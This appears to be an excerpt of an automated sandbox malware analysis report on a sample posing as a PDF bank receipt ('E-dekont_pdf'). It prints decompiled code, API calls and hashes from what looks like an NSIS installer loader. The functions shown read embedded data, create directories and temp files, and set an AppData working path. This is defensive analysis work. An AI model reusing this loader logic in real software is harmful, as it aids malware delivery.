                                                                                              • Instruction Fuzzy Hash: 3E814831D08228DBEF28CFA8C8447ADBBB1FF44305F14816AD856B7281D778A986DF45
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F132049 Relevance: 7.6, APIs: 5, Instructions: 129memoryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1042 6f132049-6f13205b 1043 6f13205e-6f132070 1042->1043 1044 6f132072-6f132075 1043->1044 1045 6f1320a0-6f1320a5 call 6f1312e1 1043->1045 1044->1045 1046 6f132077-6f13207a 1044->1046 1050 6f1320aa 1045->1050 1048 6f132083-6f132089 1046->1048 1049 6f13207c-6f132081 call 6f131593 1046->1049 1053 6f132093-6f13209e 1048->1053 1054 6f13208b-6f13208c call 6f131548 1048->1054 1051 6f1320ab 1049->1051 1050->1051 1055 6f1320ad-6f1320b7 1051->1055 1053->1055 1060 6f132091 1054->1060 1058 6f1320c1 1055->1058 1059 6f1320b9-6f1320bf 1055->1059 1061 6f1320c7-6f1320da 1058->1061 1059->1061 1060->1050 1062 6f1320e0 1061->1062 1063 6f1321bc 1061->1063 1064 6f132103-6f132110 call 6f13135a 1062->1064 1065 6f132172-6f132177 1062->1065 1066 6f132190-6f1321b9 call 6f13149e 1062->1066 1067 6f1320e7-6f1320ef 1062->1067 1068 6f132115-6f132122 call 6f1312e1 1062->1068 1069 6f1320f4-6f1320f5 call 6f13135a 1062->1069 1070 6f132124-6f132152 GlobalAlloc WideCharToMultiByte 1062->1070 1071 6f132154-6f132170 GlobalAlloc CLSIDFromString 1062->1071 1072 6f1321be-6f1321cb GlobalFree 1063->1072 1064->1063 1065->1072 1073 6f132179-6f13218e call 6f13135a call 6f1319db 1065->1073 1066->1063 1067->1072 1081 6f1320fa-6f1320fe 1068->1081 1069->1081 1070->1072 1071->1063 1077 6f1321e2-6f1321e6 1072->1077 1078 6f1321cd-6f1321dd 1072->1078 1073->1072 1078->1043 1081->1063
                                                                                              C-Code - Quality: 76%
                                                                                              			E6F132049(signed int _a4) {
				signed int _t44;
				void* _t45;
				signed int _t46;
				signed int _t50;
				void* _t54;
				signed int _t57;
				void* _t58;
				int _t59;

				_t50 = _a4;
				_t59 = 0;
				_t44 = 0 |  *((intOrPtr*)(_t50 + 0x1014)) > 0x00000000;
				while(1) {
					L1:
					_a4 = _t44;
					_t57 = _t44 << 5;
					_t58 =  *(_t57 + _t50 + 0x1030);
					if(_t58 == 0 || _t58 == 0x1a) {
						goto L8;
					}
					if(_t58 != 0xffffffff) {
						_t49 = _t58 - 1;
						if(_t58 - 1 > 0x18) {
							 *(_t57 + _t50 + 0x1030) = 0x1a;
							L11:
							_t54 = _t57 + _t50;
							if( *((intOrPtr*)(_t57 + _t50 + 0x101c)) >= _t59) {
							}
							_t46 =  *(_t57 + _t50 + 0x1018) & 0x000000ff;
							 *(_t57 + _t50 + 0x1034) =  *(_t57 + _t50 + 0x1034) & 0x00000000;
							if(_t46 > 7) {
								L26:
								_t59 = 0;
								goto L27;
							} else {
								switch( *((intOrPtr*)(_t46 * 4 +  &M6F1321E9))) {
									case 0:
										_t59 = 0;
										 *((intOrPtr*)(_t54 + 0x1020)) = 0;
										goto L27;
									case 1:
										_push(__esi);
										__eax = E6F13135A();
										goto L18;
									case 2:
										_push(__esi);
										__eax = E6F13135A();
										_pop(__ecx);
										 *__ebp = __eax;
										_a4 = __edx;
										goto L26;
									case 3:
										__eax = GlobalAlloc(0x40,  *0x6f135040);
										 *(__edi + __ebx + 0x1034) = __eax;
										 *__ebp = __eax;
										__ebp = 0;
										__ecx =  *0x6f135040;
										__eax = WideCharToMultiByte(0, 0, __esi,  *0x6f135040, __eax,  *0x6f135040, 0, 0);
										goto L27;
									case 4:
										__eax = E6F1312E1(__esi);
										 *(__edi + __ebx + 0x1034) = __eax;
										L18:
										_pop(__ecx);
										 *__ebp = __eax;
										goto L26;
									case 5:
										__eax = GlobalAlloc(0x40, 0x10);
										_push(__eax);
										 *(__edi + __ebx + 0x1034) = __eax;
										_push(__esi);
										 *__ebp = __eax;
										__imp__CLSIDFromString();
										goto L26;
									case 6:
										__ebp = 0;
										if( *__esi != __bp) {
											_push(__esi);
											__eax = E6F13135A();
											 *(__edi + __ebx + 0x1020) = __eax;
										}
										L27:
										_t47 = GlobalFree(_t58); // executed
										_t55 = _a4;
										if(_t55 == 0) {
											return _t47;
										}
										_t53 =  !=  ? _t55 + 1 : 0;
										_t44 =  !=  ? _t55 + 1 : 0;
										goto L1;
									case 7:
										__ecx =  *(__edi + __ebx + 0x1030);
										__eax =  *0x6f135038;
										 *(__edi + __ebx + 0x1030) - 1 = ( *(__edi + __ebx + 0x1030) - 1) *  *0x6f135040;
										__ecx =  *0x6f135038 + ( *(__edi + __ebx + 0x1030) - 1) *  *0x6f135040 * 2;
										__eax = __ecx + 0x18;
										 *(__edx + 0x1020) = __eax;
										_push(__ecx);
										asm("cdq");
										_push(__edx);
										_push(__eax);
										__eax = E6F13149E(__ecx);
										__esp = __esp + 0xc;
										goto L26;
								}
							}
						}
						_t45 = E6F131548(_t49);
						L9:
						L10:
						_t58 = _t45;
						goto L11;
					}
					_t45 = E6F131593();
					goto L10;
					L8:
					_t45 = E6F1312E1(0x6f1340e0);
					goto L9;
				}
			}











                                                                                              0x6f13204a
                                                                                              0x6f132051
                                                                                              0x6f13205b
                                                                                              0x6f13205e
                                                                                              0x6f13205e
                                                                                              0x6f132060
                                                                                              0x6f132064
                                                                                              0x6f132067
                                                                                              0x6f132070
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f13207a
                                                                                              0x6f132083
                                                                                              0x6f132089
                                                                                              0x6f132093
                                                                                              0x6f1320ad
                                                                                              0x6f1320ad
                                                                                              0x6f1320b7
                                                                                              0x6f1320b7
                                                                                              0x6f1320c7
                                                                                              0x6f1320cf
                                                                                              0x6f1320da
                                                                                              0x6f1321bc
                                                                                              0x6f1321bc
                                                                                              0x00000000
                                                                                              0x6f1320e0
                                                                                              0x6f1320e0
                                                                                              0x00000000
                                                                                              0x6f1320e7
                                                                                              0x6f1320e9
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f1320f4
                                                                                              0x6f1320f5
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f132103
                                                                                              0x6f132104
                                                                                              0x6f132109
                                                                                              0x6f13210a
                                                                                              0x6f13210d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f13212c
                                                                                              0x6f132132
                                                                                              0x6f132139
                                                                                              0x6f13213c
                                                                                              0x6f13213e
                                                                                              0x6f13214c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f132116
                                                                                              0x6f13211b
                                                                                              0x6f1320fa
                                                                                              0x6f1320fa
                                                                                              0x6f1320fb
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f132158
                                                                                              0x6f13215e
                                                                                              0x6f13215f
                                                                                              0x6f132166
                                                                                              0x6f132167
                                                                                              0x6f13216a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f132172
                                                                                              0x6f132177
                                                                                              0x6f132179
                                                                                              0x6f13217a
                                                                                              0x6f132187
                                                                                              0x6f132187
                                                                                              0x6f1321be
                                                                                              0x6f1321bf
                                                                                              0x6f1321c5
                                                                                              0x6f1321cb
                                                                                              0x6f1321e6
                                                                                              0x6f1321e6
                                                                                              0x6f1321d8
                                                                                              0x6f1321db
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f132190
                                                                                              0x6f132197
                                                                                              0x6f13219d
                                                                                              0x6f1321a4
                                                                                              0x6f1321a7
                                                                                              0x6f1321aa
                                                                                              0x6f1321b0
                                                                                              0x6f1321b1
                                                                                              0x6f1321b2
                                                                                              0x6f1321b3
                                                                                              0x6f1321b4
                                                                                              0x6f1321b9
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f1320e0
                                                                                              0x6f1320da
                                                                                              0x6f13208c
                                                                                              0x6f1320aa
                                                                                              0x6f1320ab
                                                                                              0x6f1320ab
                                                                                              0x00000000
                                                                                              0x6f1320ab
                                                                                              0x6f13207c
                                                                                              0x00000000
                                                                                              0x6f1320a0
                                                                                              0x6f1320a5
                                                                                              0x00000000
                                                                                              0x6f1320a5

                                                                                              APIs
                                                                                              • GlobalFree.KERNELBASE(00000000), ref: 6F1321BF
                                                                                                • Part of subcall function 6F1312E1: lstrcpynW.KERNEL32(00000000,?,6F13156A,?,6F1311C4,-000000A0), ref: 6F1312F1
                                                                                              • GlobalAlloc.KERNEL32(00000040), ref: 6F13212C
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6F13214C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77216589547.000000006F131000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F130000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77216556616.000000006F130000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77216631683.000000006F134000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77216670009.000000006F136000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_6f130000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                              • String ID:
                                                                                              • API String ID: 4216380887-0
                                                                                              • Opcode ID: 92087f4fd3a7006acb958e99d4026d000cfc902b9a2859d779825fae81a159b0
                                                                                              • Instruction ID: e5f4a1e18cc2b112b1b839fb8d9eeb91610cc94f655afdf30891845cea815536
                                                                                              • Opcode Fuzzy Hash: 92087f4fd3a7006acb958e99d4026d000cfc902b9a2859d779825fae81a159b0
                                                                                              • Instruction Fuzzy Hash: 14410773D057A5EFC714AF28CA44ADA77B8FB063D4B41023EE948EA145D7726570CAE0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00403371 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 88COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 92%
                                                                                              			E00403371(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
				long _v8;
				long _t21;
				long _t22;
				void* _t24;
				long _t26;
				int _t27;
				long _t28;
				void* _t30;
				long _t31;
				long _t32;
				long _t36;

				_t21 = _a4;
				if(_t21 >= 0) {
					_t32 = _t21 +  *0x4702b8;
					 *0x4326f4 = _t32;
					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
				}
				_t22 = E00403479(4);
				if(_t22 >= 0) {
					_t24 = E004061DB( *0x40a01c,  &_a4, 4); // executed
					if(_t24 == 0) {
						L18:
						_push(0xfffffffd);
						goto L19;
					} else {
						 *0x4326f4 =  *0x4326f4 + 4;
						_t36 = E00403479(_a4);
						if(_t36 < 0) {
							L21:
							_t22 = _t36;
						} else {
							if(_a12 != 0) {
								_t26 = _a4;
								if(_t26 >= _a16) {
									_t26 = _a16;
								}
								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
								if(_t27 != 0) {
									_t36 = _v8;
									 *0x4326f4 =  *0x4326f4 + _t36;
									goto L21;
								} else {
									goto L18;
								}
							} else {
								if(_a4 <= 0) {
									goto L21;
								} else {
									while(1) {
										_t28 = _a4;
										if(_a4 >= 0x4000) {
											_t28 = 0x4000;
										}
										_v8 = _t28;
										if(E004061DB( *0x40a01c, 0x4266f0, _t28) == 0) {
											goto L18;
										}
										_t30 = E0040620A(_a8, 0x4266f0, _v8); // executed
										if(_t30 == 0) {
											_push(0xfffffffe);
											L19:
											_pop(_t22);
										} else {
											_t31 = _v8;
											_a4 = _a4 - _t31;
											 *0x4326f4 =  *0x4326f4 + _t31;
											_t36 = _t36 + _t31;
											if(_a4 > 0) {
												continue;
											} else {
												goto L21;
											}
										}
										goto L22;
									}
									goto L18;
								}
							}
						}
					}
				}
				L22:
				return _t22;
			}














                                                                                              0x00403375
                                                                                              0x0040337e
                                                                                              0x00403387
                                                                                              0x0040338b
                                                                                              0x00403396
                                                                                              0x00403396
                                                                                              0x0040339e
                                                                                              0x004033a5
                                                                                              0x004033b7
                                                                                              0x004033be
                                                                                              0x00403463
                                                                                              0x00403463
                                                                                              0x00000000
                                                                                              0x004033c4
                                                                                              0x004033c7
                                                                                              0x004033d3
                                                                                              0x004033d7
                                                                                              0x00403471
                                                                                              0x00403471
                                                                                              0x004033dd
                                                                                              0x004033e0
                                                                                              0x0040343f
                                                                                              0x00403445
                                                                                              0x00403447
                                                                                              0x00403447
                                                                                              0x00403459
                                                                                              0x00403461
                                                                                              0x00403468
                                                                                              0x0040346b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004033e2
                                                                                              0x004033e5
                                                                                              0x00000000
                                                                                              0x004033eb
                                                                                              0x004033f0
                                                                                              0x004033f7
                                                                                              0x004033fa
                                                                                              0x004033fc
                                                                                              0x004033fc
                                                                                              0x00403409
                                                                                              0x00403413
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040341c
                                                                                              0x00403423
                                                                                              0x0040343b
                                                                                              0x00403465
                                                                                              0x00403465
                                                                                              0x00403425
                                                                                              0x00403425
                                                                                              0x00403428
                                                                                              0x0040342b
                                                                                              0x00403431
                                                                                              0x00403437
                                                                                              0x00000000
                                                                                              0x00403439
                                                                                              0x00000000
                                                                                              0x00403439
                                                                                              0x00403437
                                                                                              0x00000000
                                                                                              0x00403423
                                                                                              0x00000000
                                                                                              0x004033f0
                                                                                              0x004033e5
                                                                                              0x004033e0
                                                                                              0x004033d7
                                                                                              0x004033be
                                                                                              0x00403473
                                                                                              0x00403476

                                                                                              APIs
                                                                                              • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 00403396
                                                                                              Strings
                                                                                              • >P, xrefs: 0040338B, 0040342B, 0040346B
                                                                                              • <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><g color="#000" font-weight="400" font-family="sans-serif" fill="#474747"><path d="M1.032 1.032V15H15V1.03zm2 2H13V13H3.03z" style="line-height:normal;font-variant-ligatures:normal;font-variant-pos, xrefs: 004033EB, 00403402, 00403418
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77084955068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77084926247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085042770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000561000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085727384.0000000000571000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: FilePointer
                                                                                              • String ID: <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><g color="#000" font-weight="400" font-family="sans-serif" fill="#474747"><path d="M1.032 1.032V15H15V1.03zm2 2H13V13H3.03z" style="line-height:normal;font-variant-ligatures:normal;font-variant-pos$>P
                                                                                              • API String ID: 973152223-3389793247
                                                                                              • Opcode ID: bb1e4cebc5dcbbcc8da6da60d5f6c2def6aeab654d6aef171c0c34421c327544
                                                                                              • Instruction ID: 5b87ae666d03a85e0880c8fa6797b588b85de508064ca19fb956cb10fba5bdd7
                                                                                              • Opcode Fuzzy Hash: bb1e4cebc5dcbbcc8da6da60d5f6c2def6aeab654d6aef171c0c34421c327544
                                                                                              • Instruction Fuzzy Hash: CA317F70100219FFDB129F65ED85E9A3F68EF04355F10403AF905EA1A1D778DA50DBA9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00405B99 Relevance: 6.0, APIs: 4, Instructions: 39COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00405B99(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f8;
				_v36.Group = 0x4083f8;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e8;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                                                                                              0x00405ba4
                                                                                              0x00405ba8
                                                                                              0x00405bab
                                                                                              0x00405bb1
                                                                                              0x00405bb5
                                                                                              0x00405bb9
                                                                                              0x00405bc1
                                                                                              0x00405bc8
                                                                                              0x00405bce
                                                                                              0x00405bd5
                                                                                              0x00405bdc
                                                                                              0x00405be4
                                                                                              0x00405be6
                                                                                              0x00000000
                                                                                              0x00405be6
                                                                                              0x00405bf0
                                                                                              0x00405bf7
                                                                                              0x00405c0d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405c0f
                                                                                              0x00405c13

                                                                                              APIs
                                                                                              • CreateDirectoryW.KERNELBASE(?,?,004D5000), ref: 00405BDC
                                                                                              • GetLastError.KERNEL32 ref: 00405BF0
                                                                                              • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405C05
                                                                                              • GetLastError.KERNEL32 ref: 00405C0F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77084955068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77084926247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085042770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000561000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085727384.0000000000571000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                              • String ID:
                                                                                              • API String ID: 3449924974-0
                                                                                              • Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                                                                              • Instruction ID: 886f74eda6482ab63e8fe18d08a652fea41827dc0a526659a7d7b5e138c44e4e
                                                                                              • Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                                                                              • Instruction Fuzzy Hash: 95010871D04219EAEF009FA1CD44BEFBBB8EF14314F04403ADA44B6180E7789648CB99
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 86%
                                                                                              			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402DA6(0xfffffff0);
				_t17 = E00405FE2(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405F64(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E00405C16( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405C33(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E00405B99( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00406668(L"C:\\Users\\Arthur\\AppData\\Roaming\\Uundvrligheden\\Rendejerns",  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x4702e8 =  *0x4702e8 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}











                                                                                              0x004015c1
                                                                                              0x004015c9
                                                                                              0x004015cc
                                                                                              0x004015d1
                                                                                              0x004015d5
                                                                                              0x004015d7
                                                                                              0x004015df
                                                                                              0x004015e1
                                                                                              0x004015e4
                                                                                              0x004015ea
                                                                                              0x00401604
                                                                                              0x00401607
                                                                                              0x004015ec
                                                                                              0x004015ec
                                                                                              0x004015ef
                                                                                              0x00000000
                                                                                              0x004015fa
                                                                                              0x004015fd
                                                                                              0x004015fd
                                                                                              0x004015ef
                                                                                              0x0040160e
                                                                                              0x00401615
                                                                                              0x00401624
                                                                                              0x00401624
                                                                                              0x00401617
                                                                                              0x0040161a
                                                                                              0x00401622
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00401622
                                                                                              0x00401615
                                                                                              0x00401627
                                                                                              0x0040162b
                                                                                              0x0040162c
                                                                                              0x004015d7
                                                                                              0x00401634
                                                                                              0x00401663
                                                                                              0x004022f1
                                                                                              0x00401636
                                                                                              0x00401638
                                                                                              0x00401645
                                                                                              0x0040164d
                                                                                              0x00401655
                                                                                              0x0040165b
                                                                                              0x0040165b
                                                                                              0x00401655
                                                                                              0x00402c2d
                                                                                              0x00402c39

                                                                                              APIs
                                                                                                • Part of subcall function 00405FE2: CharNextW.USER32(?,?,0045A750,?,00406056,0045A750,0045A750, 4?v.?v,?,763F2EE0,00405D94,?,763F3420,763F2EE0,00000000), ref: 00405FF0
                                                                                                • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                                                                                                • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                                                                                              • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                • Part of subcall function 00405B99: CreateDirectoryW.KERNELBASE(?,?,004D5000), ref: 00405BDC
                                                                                              • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Uundvrligheden\Rendejerns,?,00000000,000000F0), ref: 0040164D
                                                                                              Strings
                                                                                              • C:\Users\user\AppData\Roaming\Uundvrligheden\Rendejerns, xrefs: 00401640
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77084955068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77084926247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085042770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000561000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085727384.0000000000571000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                              • String ID: C:\Users\user\AppData\Roaming\Uundvrligheden\Rendejerns
                                                                                              • API String ID: 1892508949-74610845
                                                                                              • Opcode ID: 53d05892ae8cccdba424d4c06e99c78b420bebc27126c6d79a3accc984ec3e0a
                                                                                              • Instruction ID: 706983d786853b9d3ab493fb34c22f4ae4f93c191eda055ecbeadfe80866d735
                                                                                              • Opcode Fuzzy Hash: 53d05892ae8cccdba424d4c06e99c78b420bebc27126c6d79a3accc984ec3e0a
                                                                                              • Instruction Fuzzy Hash: 42112231408104EBCF206FA1CD44A9E36A0EF15329B28093FF505B22F1DB3E4981DB4D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00406187 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00406187(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a5ac; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}












                                                                                              0x0040618d
                                                                                              0x00406193
                                                                                              0x00406194
                                                                                              0x00406194
                                                                                              0x00406199
                                                                                              0x0040619a
                                                                                              0x0040619d
                                                                                              0x004061a2
                                                                                              0x004061a5
                                                                                              0x004061af
                                                                                              0x004061bc
                                                                                              0x004061c0
                                                                                              0x004061c8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004061cc
                                                                                              0x00000000
                                                                                              0x004061ce
                                                                                              0x004061ce
                                                                                              0x004061ce
                                                                                              0x004061d1
                                                                                              0x004061d4
                                                                                              0x004061d4
                                                                                              0x004061d7
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • GetTickCount.KERNEL32 ref: 004061A5
                                                                                              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040363E,004D1000,004D5000,004D5000,004D5000,004D5000,004D5000,004D5000,00403923), ref: 004061C0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77084955068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
